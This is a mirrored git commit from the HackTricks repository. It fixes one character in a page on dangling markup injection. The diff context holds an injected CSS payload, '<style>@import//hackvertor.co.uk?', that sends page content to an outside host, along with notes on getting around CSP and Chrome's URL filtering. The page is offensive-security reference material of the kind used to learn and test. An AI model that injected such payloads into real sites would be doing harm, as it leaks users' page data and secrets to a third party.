mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
Update in content
Line should be You can also abuse CSS @import (will send all the code until it find a ";") not colon
This commit is contained in:
parent
78263a7294
commit
84f56735df
1 changed files with 1 additions and 1 deletions
|
@ -23,7 +23,7 @@ If the `img` tag is forbidden \(due to CSP for example\) you can also use `<meta
|
|||
|
||||
Note that **Chrome blocks HTTP URLs** with "<" or "\n" in it, so you could try other protocol schemes like "ftp".
|
||||
|
||||
You can also abuse CSS `@import` \(will send all the code until it find a ":"\)
|
||||
You can also abuse CSS `@import` \(will send all the code until it find a ";"\)
|
||||
|
||||
```markup
|
||||
<style>@import//hackvertor.co.uk? <--- Injected
|
||||
|
|
Loading…
Reference in a new issue